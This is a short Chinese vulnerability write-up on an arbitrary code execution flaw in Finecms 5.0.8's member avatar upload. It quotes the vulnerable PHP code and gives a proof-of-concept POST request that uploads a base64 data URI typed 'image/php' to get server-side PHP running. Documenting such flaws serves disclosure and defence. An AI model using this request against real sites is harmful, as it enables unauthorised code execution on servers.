Finecms 5.0.8 会员中心任意代码执行漏洞.md

888 B / 2021-07-15 19:53:01
    Finecms 5.0.8 会员中心任意代码执行漏洞
======================================

一、漏洞简介
------------

二、漏洞影响
------------

Finecms 5.0.8

三、复现过程
------------

### 漏洞分析

在文件`./controllersmemberAccount.php`中的upload函数

    if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
                    $new_file = $dir.'0x0.'.$result[2];
                    if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                        exit(dr_json(0, '目录权限不足或磁盘已满'));
                    

### 漏洞复现

注册会员，登录访问：

    http://www.0-sec.org:88/index.php?s=member&c=account&m=upload

    POST：tx=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

2.png

3.png

参考链接
--------

> http://4o4notfound.org/index.php/archives/40/